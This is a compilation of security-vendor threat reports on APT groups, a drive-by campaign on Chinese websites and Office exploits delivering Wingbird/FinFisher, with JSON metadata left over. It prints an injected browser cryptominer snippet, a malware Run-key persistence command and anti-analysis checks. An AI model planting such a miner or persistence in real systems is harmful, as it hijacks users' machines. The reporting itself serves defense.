For CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and, of course, it will not protect against exploits for other third party software.

Deploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:

 * PDM:Exploit.Win32.Generic
 * HEUR:Exploit.SWF.Generic
 * HEUR:Exploit.MSOffice.Generic

More information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

## Acknowledgements

We would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.

## References

 1. Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>

## Indicators of compromise

 * 4a49135d2ecc07085a8b7c5925a36c0a
 * 89.45.67[.]107

Source: Securelist, "BlackOasis APT and new targeted attacks leveraging zero-day exploit", published 2017-10-16, https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

# APT Trends report Q2 2017

## Introduction

Since 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya, are covered in both private and public reports.

Kaspersky's Private Threat Intelligence Portal (TIP)

In Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months.
We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports, in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.

## Russian-Speaking Actors

The second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.

March and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third was a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.

GReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running "Mosquito Turla" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.

June saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) "ExPetr". While initial assessments presumed that this was yet another ransomware attack à la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence_ assessment that the attacks may share traits with the BlackEnergy actors.

Below is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.

 1. Sofacy Dabbling in New Macro Techniques
 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning
 3. Turla EPS Zero Day - early warning
 4. Mosquito Turla Targets Foreign Affairs Globally
 5. Update on Zebrocy Activity June 2017
 6. ExPetr motivation and attribution - Early alert
 7. BlackBox ATM attacks using SDC bus injection

## English-Speaking Actors

English-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.

Continuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.

Our tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and the Middle East. During this investigation, GReAT researchers also discovered two additional Lambert families (Red Lambert and Brown Lambert), currently under investigation for Q3. Below is a list of report titles for reference:

 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor
 2. The Gray Lambert – A Leap in Sophistication to User-land NOBUS Passive Implants

## Korean-speaking Actors

Our researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other "money-makers". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.

WannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us was the probable linkage to the Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:

 1. Manuscrypt - malware family distributed by Lazarus
 2. Lazarus actor targets carders
 3. Lazarus-linked ATM Malware On the Loose In South Korea
 4. Lazarus targets electronic currency operators
 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert
 6. WannaCry possibly tied to the Lazarus APT Group
 7. The First WannaCry Spearphish and Module Distribution

## Middle Eastern Actors

While there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past: CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.

After the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.

 1. OilRig exploiting CVE-2017-0199 in new campaign
 2. BlackOasis using Ole2Link zero day exploit in the wild

## Chinese-Speaking Actors

On the Chinese speaking front, we felt it necessary to produce two reports to our customers.
While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.

One of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.

Another report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.

 1. Updated technical analysis of Hias RAT
 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia

## Best of the rest

Sometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.

Demsty is a new piece of MacOS malware that is targeting university researchers in Hong Kong, among others. At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.

During Q2, the mischievous ShadowBrokers also continued their regular activities, dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.

Reports in the 'unknown' category:

 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis
 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims
 3. University Researchers Located in Hong Kong Targeted with Demsty

## Predictions

Based on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:

 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.
 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.
 3. Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.
 4. In China, the past months have been marked by dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and, according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.
 5. Targeting of energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward, given their control of oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting, as it has in years past.
 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.

## How to keep yourself protected

One of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases, is very important.

Another problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry about because that actor's focus has been only certain countries or certain industry sectors, only to discover later that their ignorance left them blind to those attacks.

As shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance – which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.

Given the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in the safe environment of a sandbox. As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on-premise and in-lab machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.

The best way to prevent attackers from finding and leveraging security holes is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advice on how to fix them, further strengthening corporate security.

Source: Securelist, "APT Trends report Q2 2017", published 2017-08-08, https://securelist.com/apt-trends-report-q2-2017/79332/

# Drive-by download campaign targets Chinese websites, experiments with exploits

During our web crawls we sometimes come across bizarre findings or patterns we haven't seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.

For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code.
Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/urlquery_results.png> \"\" )\n\nThe campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser's address bar shows _gusto-delivery[.]com_, there are several injected layers that expose visitors to unwanted code and malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/site_view1.png> \"\" )\n\nFor instance, we find a reference to a Coinhive clone_:_\n \n \n var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {\n threads: navigator.hardwareConcurrency,\n autoThreads: false,\n throttle: 0.2,\n forceASMJS: false\n });\n miner.start();\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_clone1.png> \"\" )\n\nWe are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at _ppoi[.]org_) only takes a 10 percent commission as opposed to 30 percent for Coinhive.\n \n \n \u4e5f\u5c31\u662f\u8bf4\uff0c\u60a8\u5c06\u83b7\u5f97\u6316\u77ff\u6536\u76ca\u768490%\uff0c\u4e0e\u77ff\u6c60\u4e0d\u540c\uff0c\u8fd9\u4e2a\u6536\u76ca\u662f\u56fa\u5b9a\u7684\uff0c\u4e0d\u8bba\u662f\u5426\u7206\u5757\u60a8\u90fd\u5c06\u83b7\u5f97\u8be5\u7b14\u6536\u76ca\n \u6211\u4eec\u5e0c\u671b\u4fdd\u755910%\u6765\u8865\u507f\u4e0d\u7206\u5757\u7684\u635f\u5931\uff0c\u7ef4\u6301\u670d\u52a1\u5668\u7684\u8fd0\u884c\u7b49\n \n I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this\n rate is fixed, regardless of actual blocks found and the luck involved finding them. 
\n We keep 10% for us to operate this service and to (hopefully) turn a profit.\n\nFinally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flow.png> \"\" )\n\nOn top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.\n\n**CVE-2008-2551**\n\nThis old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published [here](<https://www.exploit-db.com/exploits/5732/>) and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2008-25511.png> \"\" )\n\n**CVE-2015-5119**\n\nThis is a Flash Player vulnerability affecting Flash up to version 18.0.0.194, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2015-51191.png> \"\" )\n\n**CVE-2016-0189**\n\nFinally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2016-01891.png> \"\" )\n\nThe final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.\n\n### Conclusion\n\nAlthough we see the use of several exploits, we cannot call this an exploit kit\u2014not even an amateur one. 
Indeed, the domain serving the exploits appears to be static and the URIs are always the same.\n\nRegardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.\n\n### Indicators of compromise\n\nMalicious redirection\n \n \n vip.rm028[].cn\n by007[.]cn\n\nExploit domain and IP\n \n \n shiquanxian.cn\n 103.85.226.65\n\nCVE-2008-2551\n \n \n 5E3AC16B7F55CA52A7B4872758F19D09BD4994190B9D114D68CAB9F1D9D5B467\n\nCVE-2015-5119\n \n \n D53F3FE4354ACFE7BD12528C20DA513DCEFA98B1D60D939BDE32C0815014137E\n\nPayload\n \n \n 65ABED6C77CC219A090EBEF73D6A526FCCEDAA391FBFDCB4B416D0845B3D0DBC\n\nThe post [Drive-by download campaign targets Chinese websites, experiments with exploits](<https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2018-02-22T16:00:00", "type": "malwarebytes", "title": "Drive-by download campaign targets Chinese websites, experiments with exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2551", "CVE-2008-25511", "CVE-2015-5119", "CVE-2015-51191", "CVE-2016-0189", "CVE-2016-01891"], "modified": "2018-02-22T16:00:00", "id": "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA", "href": 
"https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mssecure": [{"lastseen": "2018-01-16T03:40:26", "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>)protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. 
While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office that allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore the Protected View warning. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in the [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking it up from publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in the script moniker, was also released. 
When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute remote code, as shown in Figure 3.\n\n\n\n_Figure 3. PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>), which was discovered in the URL moniker and which, like HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as a zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of an exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in the .NET Framework while parsing a WSDL definition using the SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker's code on vulnerable machines. 
This exploit piqued our interest because it delivered one of the most complex, multi-VM-layered pieces of malware, FinFisher, whose techniques we discuss in the following section.\n\nThe CVE-2017-8759 exploit soon got ported to a PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, on September 28, 2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). Forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as an element type in the malicious RTF attachment. 
This element is not supported in the official RTF specification but serves as an effective obfuscation against static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with the government-grade commercial surveillance software FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in its attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in its attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. 
These are mostly in line with the findings of Kaspersky Lab, documented in a [blog post](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Here's a summary of interesting tidbits, which we will expand on in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that probe whether the malware is being run in a virtualized or debugged environment. We found at least 12 different checks that stop the malware from executing in such environments. 
The most effective ones are:\n\n * Sandbox environment checks\n   * Checks if the malware is executed under the root folder of a drive\n   * Checks if the malware file is readable from an external source and if the execution path contains the MD5 of its own contents\n * Fingerprinting check\n   * Checks if the machine GUID, Windows product ID, and system BIOS are from well-known sources\n * VM detection\n   * Checks if the machine hardware IDs are _VmBus_ in the case of Hyper-V, _VEN_15AD_ in the case of VMware, etc.\n * Debugger detection\n   * Detects a debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _[randomName].cab_ - Encrypted configuration file\n * _setup.cab_ - The last PE code section of the setup module; content still unknown\n * _d3d9.dll_ - Malware loader used on systems with restricted privileges; the module is protected by a VM\n * _aepic.dll_ (or other name) - Malware loader used on admin-privileged systems; executed from (and injected into) a fake service; protected by a VM\n * _msvcr90.dll_ - Malware loader DLL injected into the explorer.exe or winlogon.exe process; protected by a VM\n * _[randomName].7z_ - Encrypted network plugin, used to spy on the victim's network communications\n * _wsecedit.rar_ - Main dropped malware executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in [_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>) or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. 
If the malware is running with restricted privileges, persistence is achieved by setting a Run key value as shown below. The name of the value is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe into the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL sideloading technique.\n\nAll of Wingbird's plugins are stored in its resource section and provide the malware with various capabilities, including stealing sensitive information, spying on internet connections, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide a more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like the one below in Office 365's Threat Explorer page:\n\n\n\n\n\n_Figure 7. Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat 